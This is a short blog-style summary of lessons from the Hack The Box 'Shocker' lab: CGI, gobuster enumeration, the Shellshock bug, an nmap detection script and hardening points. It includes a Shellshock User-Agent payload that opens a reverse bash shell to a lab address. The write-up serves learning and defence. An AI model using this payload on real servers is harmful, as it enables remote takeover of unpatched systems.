Sofblocks

Sofblocks

Cyber Security & Sys Admin.

Shocker - HTB

1 minute read

Instead of doing a writeup I have opted to write a summary of the things that I learnt from solving the Shocker of Hack The Box.

Cgi-Bin

In computing, Common Gateway Interface (CGI) is an interface specification for web servers to execute programs like console applications (also called command-line interface programs) running on a server that generates web pages dynamically. Such programs are known as CGI scripts or simply as CGIs.

Shellshock Script vulnerability affected web servers utilizing CGI

The path to “cgi-bin” directory is: /var/www/html/ex/example.com/cgi-bin On Ubuntu, the standard cgi-bin directory is /usr/lib/cgi-bin.

Gobuster -f

Sometimes a directory bursting tool may fail to list directories mainly because of restrition put on the files and directories. In such cases the webserver responds back with 403 status code, Indicating directory exist but you dont have permission to access it. A quick way to sort out this issue is by using the “-f” flag if the tool used was gobuster.

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.10.56 -f

For quick discovery of files one can add the files extensions usinf the “-x” flag.

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.10.56/cgi-bin/ -x sh,pl

To list the file extensions

Shellshock Script / Bash Bug

ACE(arbitrary code execution) vulnerability attacks are executed on programs that are running, and require a highly sophisticated understanding of the internals of code execution, memory layout, and assembly language—in short, this type of attack requires an expert.

upload-image

User-Agent: () { :;}; /bin/bash -i >& /dev/tcp/10.10.14.15/4444 0>&1

To find out whether a target is vulnerable to shellshock, we use a nmap script.

nmap -sV -p80 --script http-shellshock --script-args uri=/cgi-bin/user.sh,cmd=ls 10.10.10.56

Points to note

  • Web server misconfiguration. one isn’t allowed to access the /cgi-bin directory but is allowed to access the user.sh file inside of that directory. The administrator should have restricted access to all the files in the directory.
  • The system was running a version of Bash that was vulnerable to the bash bug. This gave us initial foothold. Administrator should have patched the system since there is a patch already out there.
  • Insecure system configuration. Administrators should conform to the principle of least privilege and the concept of separation of privileges. Giving the user sudo access to run perl, allowed easy priviledge escalation of the system.

Leave a comment

You may also enjoy

Azure Attack Paths Management

14 minute read

Posted:

Every object in azure (users, service principals, device, apps) combines to form attack paths that adversaries can find and exploit and take over your whole ...

Azure Cloud Pentesting

13 minute read

Posted:

The rise of cloud computing has seen many companies shifting their attention to adopting cloud services such as storage, network, database, and software appl...

Azure AD Single Sign On (SSO) - Sophos Firewall

5 minute read

Posted:

Single sign-on (SSO) is a technology which combines several different application login screens into one regardless of the domain, platform, or technology th...

Azure Powershell

6 minute read

Posted:

PowerShell is a command-based shell and scripting language used for task automation and as a configuration framework tool. PowerShell runs on Windows, Linux,...